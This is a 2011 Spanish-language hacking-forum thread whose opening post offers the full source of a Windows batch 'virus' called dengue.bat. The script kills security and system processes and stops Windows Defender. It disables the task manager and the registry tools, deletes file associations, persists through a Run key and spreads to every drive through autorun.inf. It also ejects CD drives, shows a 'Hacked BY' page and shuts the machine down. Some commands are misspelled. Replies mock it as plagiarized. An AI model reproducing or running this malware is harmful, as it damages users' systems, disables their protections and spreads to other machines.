elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  virus informatico dengue.bat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: virus informatico dengue.bat  (Leído 4,827 veces)
W4rR3d

Desconectado Desconectado

Mensajes: 12


Ver Perfil
virus informatico dengue.bat
« en: 5 Febrero 2011, 01:39 am »

Código
  1. @echo off
  2. msg * hacked by -={W4rR3d}=-
  3. :: este virus fue creado por hacked by  W4rR3d
  4. :: este virus esta dedicado a la comunidad hacker piura- peru
  5. :: este virus informatico se llama dengue.bat
  6. tasskill /im explorer.exe /f>nul 2>&1
  7. taskill explorer>nul 2>&1
  8. tskill /f/im "explorer.exe /im "teatimer.exe"/im "taskmgr.exe"
  9. taskkill /im rstrui.exe /f>nul 2>&1 || taskill rstrui>nul 2>&1
  10. taskkill /f /im firefox.exe>nul 2>&1 || tskill firefox.exe
  11. taskkill /f /t /im "FirewallControlPanel.exe"
  12. taskkill /f /t /im "MSASCui.exe"  
  13. net stop "wscsvc"
  14. net stop "WinDefend"
  15. net stop "Security Center"
  16. reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
  17. reg add "HKCUSoftwareMicrosoftWindowsCurrentversionPoliciesSystem" /v DisableTaskMgr /t reg_dword /d 1 /f
  18. reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableRegistryTools /t reg_dword /d 1 /f
  19. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents" /f
  20. reg delete "HKEY_CLASSES_ROOT\.docx" /f
  21. reg delete "HKEY_CLASSES_ROOT\.htm\OpenWithList\WINWORD.EXE\shell\edit\command" /f
  22. reg delete "HKEY_CLASSES_ROOT\.mht\OpenWithList\Excel.exe\shell\edit\command" /f
  23. reg delete "HKEY_CLASSES_ROOT\.mht\OpenWithList\Microsoft Office Word\shell\edit\command" /f
  24. reg delete "HKEY_CLASSES_ROOT\.xlsx" /f
  25. reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder" /f
  26. reg delete "HKEY_CURRENT_USER\Software\Microsoft\RegEdt32" /f
  27. reg delete "HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger\Webcam" /f
  28. reg delete "HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer" /f
  29. reg delete "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSpeed /f
  30. reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSpeed /d "0"
  31. reg delete "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSensitivity /f
  32. reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v MouseSensitivity /d "0" /f
  33. reg delete "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardDelay /f
  34. reg add "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardDelay /d "100" /f
  35. reg delete "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardSpeed /f
  36. reg add "HKEY_CURRENT_USER\Control Panel\Keyboard" /v KeyboardSpeed /d "0" /f
  37. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cpls" /v Internet Connection Firewall/f
  38. for /F %%- in (MSMemoticon,FreeXXXPhotos,Office2007) do (call :reiniciar %%-)
  39. copy /y "%0" "%homedrive%\dengue.bat">nul 2>&1
  40. reg add hklm\software\microsoft\windows\currentversion\run /v dengue /t reg_sz /d %homedrive%\dengue.bat /f
  41. for %%E In (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
  42. copy /Y %0 %%E:\dengue.bat
  43. echo.[AutoRun]>> %%E:\autorun.inf
  44. echo.open="%%E:\dengue.bat">> %%E:\autorun.inf
  45. echo.action=Open folder to see files...>> %%E:\autorun.inf
  46. attrib +r +s +h %%E:\autorun.inf
  47. attrib +r +s +h %%E:\dengue.bat
  48. echo On Error Resume Next >> %homedrive%\abrir.vbs
  49. echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> %homedrive%\abrir.vbs
  50. echo Set colCDROMs = oWMP.cdromCollection >> %homedrive%\abrir.vbs
  51. echo. >> %homedrive%\abrir.vbs
  52. echo if colCDROMs.Count >= 1 then >> %homedrive%\abrir.vbs
  53. echo          For i = 0 to colCDROMs.Count - 1 >> %homedrive%\abrir.vbs
  54. echo                   colCDROMs.Item(i).Eject >> %homedrive%\abrir.vbs
  55. echo          Next    ' cdrom >> %homedrive%\abrir.vbs
  56. echo End If >> %homedrive%\abrir.vbs
  57. start %homedrive%\abrir.vbs
  58. (echo.^<HTML^>
  59. echo.%^<HEAD^>
  60. echo.^<title^>Hacked BY W4rR3d^</title^>
  61. echo.^</HEAD^>
  62. echo.^<BODY^>
  63. echo.^<H1^>         ~~~Hacked BY W4rR3d~~~
  64. echo.^</BODY^>
  65. echo.^</HTML^>)>%homedrive%\aegypti.HTML
  66. REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v virus /t REG_SZ /d %homedrive%\aegypti.HTML
  67. )
  68. start %homedrive%\aegypti.HTML
  69. :reiniciar
  70. echo On Error Resume Next >> %homedrive%\renic.vbs
  71. echo set shell = CreateObject("WScript.Shell") >> %homedrive%\renic.vbs
  72. echo shell.run "shutdown.exe -s  -t 10" >> %homedrive%\renic.vbs
  73. start >> %homedrive%\renic.vbs
  74. goto:eof
  75.  
  76. si ven algun error  en este virus informatico lo notifican. su amigo hacked by W4rR3d


« Última modificación: 5 Febrero 2011, 05:04 am por Leo Gutiérrez. » En línea

xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: virus informatico dengue.bat
« Respuesta #1 en: 6 Febrero 2011, 02:03 am »

¿Y si haces uno tú solo sin rippear y desde cero? :xD


En línea

CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Re: virus informatico dengue.bat
« Respuesta #2 en: 6 Febrero 2011, 02:13 am »

pilla2 jajajajajajajajajaja  >:D
En línea

SuperDraco


Desconectado Desconectado

Mensajes: 2.505


Crew Dragon


Ver Perfil
Re: virus informatico dengue.bat
« Respuesta #3 en: 6 Febrero 2011, 04:01 am »

¿Pero que broma es esta? XD

Código:
tasskill /im explorer.exe /f>nul 2>&1
taskill explorer>nul 2>&1
tskill /f/im "explorer.exe /im "teatimer.exe"/im "taskmgr.exe"

hasta yo lo hago mejor que tu y mira q soy malo XD
anda y no plagies a pablomi.


En serio, yo lo de este tipo no me lo trago XD! creo que solo busca joder, ya dijo Leo lo del taskkill y sigue igual... :laugh: y luego ese nick WARRED... que suena a enguarrao :xD :xD :xD WTF!?.
« Última modificación: 6 Febrero 2011, 04:08 am por pitoloko » En línea

No he vuelto, solo estoy de paso.
leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: virus informatico dengue.bat
« Respuesta #4 en: 8 Febrero 2011, 22:32 pm »

Bueno, ya, suficiente.
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[BATCH] virus informatico viruela.exe
Scripting
W4rR3d 1 2,839 Último mensaje 10 Febrero 2011, 17:43 pm
por SuperDraco
[BATCH] virus informatico fiebre.exe « 1 2 3 »
Scripting
W4rR3d 23 13,868 Último mensaje 18 Octubre 2011, 03:17 am
por Sorke
virus informatico msn.exe « 1 2 »
Scripting
W4rR3d 10 7,277 Último mensaje 21 Febrero 2011, 01:40 am
por ace332
virus informatico taskmgr.bat
Scripting
W4rR3d 4 4,622 Último mensaje 26 Marzo 2011, 13:13 pm
por FranciskoAsdf
Japón desarrolla un virus informático para localizar y destruir otros virus « 1 2 »
Noticias
wolfbcn 11 7,042 Último mensaje 6 Mayo 2012, 02:08 am
por anonimo12121
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines